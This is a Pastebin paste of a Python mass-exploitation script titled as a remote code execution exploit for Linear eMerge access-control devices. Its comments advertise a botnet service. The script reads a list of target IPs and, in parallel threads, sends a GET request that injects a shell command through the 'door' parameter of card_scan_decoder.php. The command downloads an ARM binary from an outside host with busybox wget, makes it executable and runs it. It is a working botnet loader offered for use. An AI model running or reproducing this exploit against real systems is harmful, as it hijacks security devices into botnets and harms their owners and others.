Advertisement
0day_of_death

LINEAR EMERGE RCE EXPLOIT

Mar 16th, 2020
825
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. # vbrxmr botnet services the big 0day hacking trio here
  4. # enjoy this big ass vuln
  5. # for these botnet skids who cant write a loader lol
  6.  
  7. import threading
  8. import sys
  9. import time
  10. import socket
  11. import requests
  12. from threading import Thread
  13. from time import sleep
  14. from requests.auth import HTTPDigestAuth
  15. from decimal import *
  16.  
  17. ips = open(sys.argv[1], "r").readlines()
  18.  
  19. payload = "busybox wget http://1.1.1.1/bins/arm7; chmod 777 arm7; ./arm7"
  20.  
  21. class emerge(threading.Thread):
  22. def __init__ (self, ip):
  23. threading.Thread.__init__(self)
  24. self.ip = str(ip).rstrip('\n')
  25. def run(self):
  26. try:
  27. url = 'http://'+self.ip+':8081/card_scan_decoder.php?No=30&door=%60'+payload+' > .hacks%60'
  28. requests.get(url, timeout=5)
  29. print("LOADING: " + self.ip)
  30. except Exception as e:
  31. pass
  32.  
  33. for ip in ips:
  34. try:
  35. n = emerge(ip)
  36. n.start()
  37. except:
  38. pass
  39.  
  40. # vbrxmr botnet services the big 0day hacking trio here
  41. # enjoy this big ass vuln
  42. # for these botnet skids who cant write a loader lol
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement